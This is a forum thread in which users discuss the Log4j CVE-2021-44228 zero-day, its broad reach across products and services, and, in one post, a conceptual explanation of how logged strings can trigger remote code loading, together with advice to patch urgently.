Products > Security

Log4j CVE-2021-44228

(1/9) > >>

Security warning: New zero-day in the Log4j Java library is already being exploited:

Log4j is a Java library for logging and it's used by many Java programs. Tons of stuff are affected by this:

And the relevance of J*va is what exactly?


You'll be suprised how many services, platforms or products are affected, e.g. iCloud, Ubiquity management tool or several Cisco products.

I'm not surprised.
Friends don't let friends use software :P

That thing is nasty. *Very* nasty.

And it potentially affects anything that you can talk to in any way.

And, as often with such nasty security issues, in hindsight it is patently stupid and ridiculous that whoever wrote the software though that the problematic feature was ever a good idea.

To clarify a bit on the issue:
Java has a feature allowing the loading of code fragments on the fly. This can happen from *any* URL though. So it can be on you local machine, or it can also be code that is lying on some host in the internet. So far, so worrying :D
The issue that log4j has, is that when it logs something that matches the proper syntax, it actually goes ahead and loads the code it finds there! So, for example, if you have an application that uses log4j2 to log usernames on failed logins, you are vulnerable. Someone can simply use the offending string as username, try to log in, and bam, you are infected.
And you not only can load stuff from any URL, you can also directly inject Java code, but then might hit length limits.

So this is a really critical flaw. You have to patch it urgently, for anything reachable from the general internet. If you have not yet patched and you are vulnerable, it might already be too late.
There are running attacks on this vulnerability. There are reports of successful attacks.


[0] Message Index

[#] Next page

There was an error while thanking
Go to full version